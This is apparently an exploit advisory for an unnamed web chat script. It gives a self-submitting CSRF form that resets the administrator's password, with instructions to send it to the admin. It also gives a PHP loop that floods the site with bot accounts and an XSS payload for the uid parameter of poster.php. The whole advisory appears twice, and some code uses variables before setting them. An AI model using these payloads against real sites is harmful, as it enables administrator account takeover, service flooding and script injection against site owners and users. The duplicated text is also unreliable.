# Date: 3-12-2015
# Exploit Author: alqnas eslam
# Software Link:
# Тестировалось на: windows и linux
1- csrf change password and setting:
save this code in html file and send it to admin
when he open it the setting will be changed
<body onload="document.alqnas.submit()">
<form action="" method="post" name="alqnas">
<input type="text" name="maxusers" value="15" />
<input type="text" name="userswidth" value="400" />
<input type="text" name="showgeo" value="y" />
<input type="text" name="showoff" value="y" />
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="alqnas" />
<input type="submit" />
</form>
</body>
2- bots flood:
you can do flood bots by this code run it with php
<?php
$i =1;
function adduser($url)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
//400 are numbers you will send it
while ( $i <=400){
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
//change localhost to url of bot
echo adduser("");
$i++;
}
?>
3- cross site scripting (xss)
in file poster.php prametar uid not fillter from html code
so we can do xss attack
"><script>alert(/xss/)</script>
# Exploit Author: alqnas eslam
# Software Link:
# Тестировалось на: windows и linux
1- csrf change password and setting:
save this code in html file and send it to admin
when he open it the setting will be changed
<body onload="document.alqnas.submit()">
<form action="" method="post" name="alqnas">
<input type="text" name="maxusers" value="15" />
<input type="text" name="userswidth" value="400" />
<input type="text" name="showgeo" value="y" />
<input type="text" name="showoff" value="y" />
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="alqnas" />
<input type="submit" />
</form>
</body>
2- bots flood:
you can do flood bots by this code run it with php
<?php
$i =1;
function adduser($url)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
//400 are numbers you will send it
while ( $i <=400){
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
//change localhost to url of bot
echo adduser("");
$i++;
}
?>
3- cross site scripting (xss)
in file poster.php prametar uid not fillter from html code
so we can do xss attack
"><script>alert(/xss/)</script>